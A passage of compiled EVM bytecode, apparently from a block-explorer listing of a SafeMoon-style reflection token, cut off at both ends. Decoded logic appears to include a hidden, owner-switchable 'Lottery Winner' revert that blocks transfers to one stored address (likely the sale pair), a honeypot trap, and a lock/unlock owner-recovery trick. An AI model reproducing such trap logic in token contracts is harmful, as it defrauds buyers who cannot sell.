ffffffffffffffffffffffffff1614156129ff576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252600e8152602001807f4c6f74746572792057696e6e657200000000000000000000000000000000000081525060200191505060405180910390fd5b612a11612a0a613363565b8484613562565b60019050612a31565b612a2c612a25613363565b8484613562565b600190505b92915050565b6000600254905090565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b612a6f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612b2f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601460156101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc1598160405180821515815260200191505060405180910390a150565b600360009054906101000a900460ff1681565b612ba0613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612c60576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b612c8a620f4240612c7c83600a54613b8890919063ffffffff16565b613a1090919063ffffffff16565b60158190555050565b612c9b613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612d5b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600360009054906101000a900460ff16612d7457600080fd5b6000600360006101000a81548160ff0219169083151502179055507f04d5b2c2f5293a956dd0943d3212b5aa3ae1a61fc8fb77eb0777c2d03241626860405160405180910390a1565b612dc5613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612e85576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550804201600281905550600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61303d613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146130fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b613160613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613220576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156132a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602681526020018061549e6026913960400191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156133f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260248152602001806155a56024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415613477576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260228152602001806154c46022913960400191505060405180910390fd5b80600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156135e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806155806025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561366e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806154516023913960400191505060405180910390fd5b600081116136c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260298152602001806155576029913960400191505060405180910390fd5b6136cf61238a565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561373d575061370d61238a565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561379e5760155481111561379d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260288152602001806154e66028913960400191505060405180910390fd5b5b60006137a9306120bd565b905060155481106137ba5760155490505b600060165482101590508080156137dc575060148054906101000a900460ff16155b801561383457507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b801561384c5750601460159054906101000a900460ff165b1561386057601654915061385f82613c0e565b5b600060019050600760008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806139075750600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561391157600090505b61391d86868684613cee565b505050505050565b60008383111582906139d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561399757808201518184015260208101905061397c565b50505050905090810190601f1680156139c45780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5060008385039050809150509392505050565b60008060006139f2613fff565b91509150613a098183613a1090919063ffffffff16565b9250505090565b6000613a5283836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250614290565b905092915050565b600080828401905083811015613ad8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b6000806000806000806000806000613af98a614356565b9250925092506000806000613b178d8686613b126139e5565b6143b0565b9250925092508282828888889b509b509b509b509b509b5050505050505091939550919395565b6000613b8083836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250613925565b905092915050565b600080831415613b9b5760009050613c08565b6000828402905082848281613bac57fe5b0414613c03576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602181526020018061550e6021913960400191505060405180910390fd5b809150505b92915050565b60016014806101000a81548160ff0219169083151502179055506000613c3e600283613a1090919063ffffffff16565b90506000613c558284613b3e90919063ffffffff16565b90506000479050613c6583614439565b6000613c7a8247613b3e90919063ffffffff16565b9050613c8683826146e7565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb56184828560405180848152602001838152602001828152602001935050505060405180910390a15050505060016014806101000a81548160ff02191690831515021790555050565b80613cfc57613cfb614838565b5b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015613d9f5750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613db457613daf84848461487b565b613feb565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015613e575750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613e6c57613e67848484614adb565b613fea565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015613f105750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613f2557613f20848484614d3b565b613fe9565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015613fc75750600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15613fdc57613fd7848484614f06565b613fe8565b613fe7848484614d3b565b5b5b5b5b80613ff957613ff86151fb565b5b50505050565b6000806000600b5490506000600a54905060005b6009805490508110156142535782600460006009848154811061403257fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054118061411957508160056000600984815481106140b157fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b1561413057600b54600a549450945050505061428c565b6141b9600460006009848154811061414457fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205484613b3e90919063ffffffff16565b925061424460056000600984815481106141cf57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205483613b3e90919063ffffffff16565b91508080600101915050614013565b5061426b600a54600b54613a1090919063ffffffff16565b82101561428357600b54600a5493509350505061428c565b81819350935050505b9091565b6000808311829061433c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156143015780820151818401526020810190506142e6565b50505050905090810190601f16801561432e5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b50600083858161434857fe5b049050809150509392505050565b6000806000806143658561520f565b9050600061437286615240565b9050600061439b8261438d858a613b3e90919063ffffffff16565b613b3e90919063ffffffff16565b90508083839550955095505050509193909250565b6000806000806143c98589613b8890919063ffffffff16565b905060006143e08689613b8890919063ffffffff16565b905060006143f78789613b8890919063ffffffff16565b90506000614420826144128587613b3e90919063ffffffff16565b613b3e90919063ffffffff16565b9050838184965096509650505050509450945094915050565b6060600267ffffffffffffffff8111801561445357600080fd5b506040519080825280602002602001820160405280156144825781602001602082028036833780820191505090505b509050308160008151811061449357fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b15801561453357600080fd5b505afa158015614547573d6000803e3d6000fd5b505050506040513d602081101561455d57600080fd5b81019080805190602001909291905050508160018151811061457b57fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506145e0307f00000000000000000000000000000000000000000000000000000000000000008461336b565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b815260040180868152602001858152602001806020018473ffffffffffffffffffffffffffffffffffffffff168152602001838152602001828103825285818151815260200191508051906020019060200280838360005b838110156146a2578082015181840152602081019050614687565b505050509050019650505050505050600060405180830381600087803b1580156146cb57600080fd5b505af11580156146df573d6000803e3d6000fd5b505050505050565b614712307f00000000000000000000000000000000000000000000000000000000000000008461336b565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d71982308560008061475c61238a565b426040518863ffffffff1660e01b8152600401808773ffffffffffffffffffffffffffffffffffffffff1681526020018681526020018581526020018481526020018373ffffffffffffffffffffffffffffffffffffffff16815260200182815260200196505050505050506060604051808303818588803b1580156147e157600080fd5b505af11580156147f5573d6000803e3d6000fd5b50505050506040513d606081101561480c57600080fd5b810190808051906020019092919080519060200190929190805190602001909291905050505050505050565b600060105414801561484c57506000601254145b1561485657614879565b601054601181905550601254601381905550600060108190555060006012819055505b565b60008060008060008061488d87613ae2565b9550955095509550955095506148eb87600560008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061498086600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614a1585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614a6181615271565b614a6b8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614aed87613ae2565b955095509550955095509550614b4b86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614be083600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614c7585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614cc181615271565b614ccb8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614d4d87613ae2565b955095509550955095509550614dab86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614e4085600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550614e8c81615271565b614e968483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b600080600080600080614f1887613ae2565b955095509550955095509550614f7687600560008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061500b86600460008c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506150a083600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061513585600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061518181615271565b61518b8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b601154601081905550601354601281905550565b6000615239606461522b60105485613b8890919063ffffffff16565b613a1090919063ffffffff16565b9050919050565b600061526a606461525c60125485613b8890919063ffffffff16565b613a1090919063ffffffff16565b9050919050565b600061527b6139e5565b905060006152928284613b8890919063ffffffff16565b90506152e681600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600860003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615615411576153cd83600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b61542b82600b54613b3e90919063ffffffff16565b600b8190555061544681600c54613a5a90919063ffffffff16565b600c81905550505056fe45524332303a207472616e7366657220746f20746865207a65726f2061646472657373416d6f756e74206d757374206265206c657373207468616e20746f74616c207265666c656374696f6e734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f20616464726573735472616e7366657220616d6f756e74206578636565647320746865206d61785478416d6f756e742e536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f7745524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655472616e7366657220616d6f756e74206d7573742062652067726561746572207468616e207a65726f45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573734578636c75646564206164647265737365732063616e6e6f742063616c6c20746869732066756e6374696f6e596f7520646f6e27742068617665207065726d697373696f6e20746f20756e6c6f636b45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e379440c2b7786635f664a15c8719517ee2189edbf65722808810a3b921b5e7c64736f6c634300060c0033
Deployed Bytecode
0x6080604052600436106102555760003560e01c806370a0823111610139578063a9059cbb116100b6578063d543dbeb1161007a578063d543dbeb14610cb8578063da98b61f14610cf3578063dd46706414610d0a578063dd62ed3e14610d45578063ea2f0b3714610dca578063f2fde38b14610e1b5761025c565b8063a9059cbb14610b71578063b6c5232414610be2578063ba13a57214610c0d578063c49b9a8014610c4e578063ce9a3b0f14610c8b5761025c565b80638ee88c53116100fd5780638ee88c53146109cd57806395d89b4114610a08578063a457c2d714610a98578063a69df4b514610b09578063a73b3c8214610b205761025c565b806370a082311461087e578063715018a6146108e35780637d1db4a5146108fa57806388f82020146109255780638da5cb5b1461098c5761025c565b806339509351116101d2578063481e27d411610196578063481e27d41461071657806349bd5a5e1461072d5780634a74bb021461076e57806352390c021461079b5780635342acb4146107ec5780636bc87c3a146108535761025c565b806339509351146105935780633b124fe7146106045780633bd5d1731461062f578063437823ec1461066a5780634549b039146106bb5761025c565b806318160ddd1161021957806318160ddd1461040957806323b872dd146104345780632d838119146104c5578063313ce567146105145780633685d419146105425761025c565b8063061c82d01461026157806306fdde031461029c578063095ea7b31461032c57806313114a9d1461039d5780631694505e146103c85761025c565b3661025c57005b600080fd5b34801561026d57600080fd5b5061029a6004803603602081101561028457600080fd5b8101908080359060200190929190505050610e6c565b005b3480156102a857600080fd5b506102b1610f3e565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156102f15780820151818401526020810190506102d6565b50505050905090810190601f16801561031e5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561033857600080fd5b506103856004803603604081101561034f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610fe0565b60405180821515815260200191505060405180910390f35b3480156103a957600080fd5b506103b2610ffe565b6040518082815260200191505060405180910390f35b3480156103d457600080fd5b506103dd611008565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561041557600080fd5b5061041e61102c565b6040518082815260200191505060405180910390f35b34801561044057600080fd5b506104ad6004803603606081101561045757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050611036565b60405180821515815260200191505060405180910390f35b3480156104d157600080fd5b506104fe600480360360208110156104e857600080fd5b810190808035906020019092919050505061139c565b6040518082815260200191505060405180910390f35b34801561052057600080fd5b50610529611420565b604051808260ff16815260200191505060405180910390f35b34801561054e57600080fd5b506105916004803603602081101561056557600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611437565b005b34801561059f57600080fd5b506105ec600480360360408110156105b657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506117c1565b60405180821515815260200191505060405180910390f35b34801561061057600080fd5b50610619611874565b6040518082815260200191505060405180910390f35b34801561063b57600080fd5b506106686004803603602081101561065257600080fd5b810190808035906020019092919050505061187a565b005b34801561067657600080fd5b506106b96004803603602081101561068d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611a0b565b005b3480156106c757600080fd5b50610700600480360360408110156106de57600080fd5b8101908080359060200190929190803515159060200190929190505050611b2e565b6040518082815260200191505060405180910390f35b34801561072257600080fd5b5061072b611be5565b005b34801561073957600080fd5b50610742611d10565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561077a57600080fd5b50610783611d34565b60405180821515815260200191505060405180910390f35b3480156107a757600080fd5b506107ea600480360360208110156107be57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611d47565b005b3480156107f857600080fd5b5061083b6004803603602081101561080f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612061565b60405180821515815260200191505060405180910390f35b34801561085f57600080fd5b506108686120b7565b6040518082815260200191505060405180910390f35b34801561088a57600080fd5b506108cd600480360360208110156108a157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506120bd565b6040518082815260200191505060405180910390f35b3480156108ef57600080fd5b506108f86121a8565b005b34801561090657600080fd5b5061090f61232e565b6040518082815260200191505060405180910390f35b34801561093157600080fd5b506109746004803603602081101561094857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612334565b60405180821515815260200191505060405180910390f35b34801561099857600080fd5b506109a161238a565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156109d957600080fd5b50610a06600480360360208110156109f057600080fd5b81019080803590602001909291905050506123b3565b005b348015610a1457600080fd5b50610a1d612485565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015610a5d578082015181840152602081019050610a42565b50505050905090810190601f168015610a8a5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b348015610aa457600080fd5b50610af160048036036040811015610abb57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612527565b60405180821515815260200191505060405180910390f35b348015610b1557600080fd5b50610b1e6125f4565b005b348015610b2c57600080fd5b50610b6f60048036036020811015610b4357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612811565b005b348015610b7d57600080fd5b50610bca60048036036040811015610b9457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061291d565b60405180821515815260200191505060405180910390f35b348015610bee57600080fd5b50610bf7612a37565b6040518082815260200191505060405180910390f35b348015610c1957600080fd5b50610c22612a41565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b348015610c5a57600080fd5b50610c8960048036036020811015610c7157600080fd5b81019080803515159060200190929190505050612a67565b005b348015610c9757600080fd5b50610ca0612b85565b60405180821515815260200191505060405180910390f35b348015610cc457600080fd5b50610cf160048036036020811015610cdb57600080fd5b8101908080359060200190929190505050612b98565b005b348015610cff57600080fd5b50610d08612c93565b005b348015610d1657600080fd5b50610d4360048036036020811015610d2d57600080fd5b8101908080359060200190929190505050612dbd565b005b348015610d5157600080fd5b50610db460048036036040811015610d6857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612fae565b6040518082815260200191505060405180910390f35b348015610dd657600080fd5b50610e1960048036036020811015610ded57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613035565b005b348015610e2757600080fd5b50610e6a60048036036020811015610e3e57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613158565b005b610e74613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f34576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8060108190555050565b6060600d8054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610fd65780601f10610fab57610100808354040283529160200191610fd6565b820191906000526020600020905b815481529060010190602001808311610fb957829003601f168201915b5050505050905090565b6000610ff4610fed613363565b848461336b565b6001905092915050565b6000600c54905090565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600a54905090565b600060011515600360009054906101000a900460ff16151514156112c457600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156110df5750600073ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b1561112a5782601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506111ef565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156111ee576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252600e8152602001807f4c6f74746572792057696e6e657200000000000000000000000000000000000081525060200191505060405180910390fd5b5b6111fa848484613562565b6112bb84611206613363565b6112b68560405180606001604052806028815260200161552f60289139600660008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061126c613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b60019050611395565b6112cf848484613562565b611390846112db613363565b61138b8560405180606001604052806028815260200161552f60289139600660008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000611341613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b600190505b9392505050565b6000600b548211156113f9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602a815260200180615474602a913960400191505060405180910390fd5b60006114036139e5565b90506114188184613a1090919063ffffffff16565b915050919050565b6000600f60009054906101000a900460ff16905090565b61143f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473fffffffffffffffffffffffffffffffffff